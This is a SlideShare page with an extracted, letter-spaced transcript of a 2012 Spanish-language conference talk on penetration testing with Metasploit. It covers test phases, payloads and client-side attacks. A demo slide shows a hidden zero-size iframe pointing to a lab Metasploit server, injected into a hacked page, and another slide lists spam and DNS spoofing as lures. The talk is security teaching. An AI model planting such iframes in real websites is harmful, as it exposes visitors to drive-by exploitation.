• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Pentesting con metasploit framework
 

Pentesting con metasploit framework

on

  • 752 views

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Statistics

Views

Total Views
752
Views on SlideShare
752
Embed Views
0

Actions

Likes
0
Downloads
18
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Pentesting con metasploit framework Pentesting con metasploit framework Presentation Transcript

    • Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
    • ¿Qué e sMe t a s p l o i t ?Es e l c a o s , p u r o y b e l l o p o rf u e r a , e t e r n o y c o mp l e j o p o rd e n t r o , e s p u r o p e n t e s t i n g …
    • Ag e n d a1. A r q u i t e c t u r a d e Me t a s p l o i t2. Fases de un test de intrusión3. ¿Dónde p a r t i c i p a Me t a s p l o i t ?4. El arte de la intrusión5. El bien y el mal…6. D e m o7. L a t i e n d a e n c a s a
    • Ar q u i te c t u r a ?
    • Fases Test Intrusión
    • Fa s e sAlcance y términos del test de intrusiónRecolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-Explotación d e l s i s t e m aGeneración d e i n f o r m e s
    • ¿Dóndep a r t i c i p a ?
    • Lo importante es…P a r t i c i p a r !!!Recolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-ExplotaciónPero incluso… a y u d a a
    • El arte de la intrusión
    • ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
    • ÁmbitoExplotación vulnerabilidades (pero…)B e s t a n d Wo r s tPr a c t i c e s
    • Elección d e l p a y l o a dMás d e 200 p a y l o a d s …Son nuestras cartas… ¿Siempreu s a r e mo s a l r e y ?
    • Tipos de Intrusión¿Cómo l a n z o l o se x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
    • Cl i e n t Si d e At t a c k !D a r k S h a d o w s , ¿Cómo hago paraque hagan peticiones a mí?M a i l i n g ? (s p a m ? ? ) Foros… Páginas w e b h a c k e a d a s …P u b l i c a c i o n e s e n I n t e r n e tA c o r t a d o r e s …A t a q u e s l o c a l e s (D N S Sp o o f )
    • El bien y el mal…
    • El límiteDebemos ser éticos… ¿Lo s o m o s ?La delgada línea…P o d e mo s u t i l i z a r l o sa t a q u e s c l i e n t -s i d ep a r a : (m u c h a s , m u c h a sc o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
    • D e mo : Aj u g a r !
    • ¿Qué v a m o s a h a c e r ?Escenario: (idea del mundo real… ^ ^ )1. Página h a c k e a d a …2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e4. Obtenemos el control…
    • I f r a me …<i f r a m es r c =h t t p ://192.168.56.101:8080/ w i d t h =0 h e i g h t =0s t y l e =“h i d d e n ”f r a m e b o r d e r =0m a r g i n h e i g h t =0m a r g i n w i d t h =0/>
    • L a t i e n d a e n c a s a
    • He tenido el honor……y han tenido la paciencia…Me t a s p l o i t p a r aPe n t e s t e r s